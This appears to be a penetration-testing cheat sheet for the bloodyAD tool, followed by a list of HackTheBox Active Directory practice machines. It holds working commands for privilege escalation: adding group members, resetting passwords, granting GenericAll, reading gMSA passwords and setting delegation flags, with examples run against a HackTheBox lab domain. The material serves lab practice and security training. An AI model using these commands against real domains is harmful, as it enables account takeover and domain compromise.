jaccostraathof

BloodyAD

BloodyAD

Retrieve User Information

 

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username

 

Add User To Group

 

bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

example

python3 bloodyAD/bloodyAD.py --host dc01.rebound.htb --dc-ip 10.10.11.231 -u oorend -p '1GR8t@$$4u' -k -d rebound.htb add groupMember "CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB" oorend [+] oorend added to CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB

 

Change Password

bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

example

python3 bloodyAD/bloodyAD.py --host dc01.rebound.htb --dc-ip 10.10.11.231 -u oorend -p '1GR8t@$$4u' -k -d rebound.htb set password "winrm_svc" 'pwned123!!!' [+] Password changed successfully!

 

Give User GenericAll Rights

 

bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username

example

python3 bloodyAD/bloodyAD.py --host dc01.rebound.htb --dc-ip 10.10.11.231 -u oorend -p '1GR8t@$$4u' -k -d rebound.htb add genericAll "OU=SERVICE USERS,DC=REBOUND,DC=HTB" oorend [+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

 

WriteOwner

 

bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username

ReadGMSAPassword

 

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword

Enable a Disabled Account

bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE

Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag

 

bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION


Notes


    

  • To use Kerberos, obtain a TGT and then pass -k instead of providing a username and password
    • 

  • You can pass a hash instead of the password
    • 



Resources



Machines To Practice


    

  • Redelegate (Vulnlab)
    • 

  • Vintage (HackTheBox)
    • 

  • Infiltrator (HackTheBox)
    • 

  • Rebound (HackTheBox)
    • 

  • Absolute (HackTheBox)
    • 

  • Certified (HackTheBox)
    • 









 


























HackTheBox AD Machines


 




A list of all Active Directory machines from HackTheBox, sorted by their release date, including difficulty levels and direct links to each machine






Machine Name
Difficulty
Machine Link






Mantis
Hard
Link




Rabbit
Insane
Link




Reel
Hard
Link




Active
Easy
Link




Sizzle
Insane
Link




Forest
Easy
Link




Resolute
Medium
Link




Monteverde
Medium
Link




Sauna
Easy
Link




Multimaster
Insane
Link




Cascade
Medium
Link




Blackfield
Hard
Link




APT
Insane
Link




PivotAPI
Insane
Link




Intelligence
Medium
Link




Return
Easy
Link




Search
Hard
Link




Acute
Hard
Link




Object
Hard
Link




Timelapse
Easy
Link




Hathor
Insane
Link




StreamIO
Medium
Link




Scrambled
Medium
Link




Support
Easy
Link




Absolute
Insane
Link




Flight
Hard
Link




Escape
Medium
Link




Coder
Insane
Link




Rebound
Insane
Link




Authority
Medium
Link




Manager
Medium
Link




Analysis
Hard
Link




Office
Hard
Link




Mist
Insane
Link




Freelancer
Hard
Link




Ghost
Insane
Link




Infiltrator
Insane
Link




Cicada
Easy
Link




University
Insane
Link




Certified
Medium
Link




Administrator
Medium
Link




Vintage
Hard
Link




EscapeTwo
Easy
Link
































.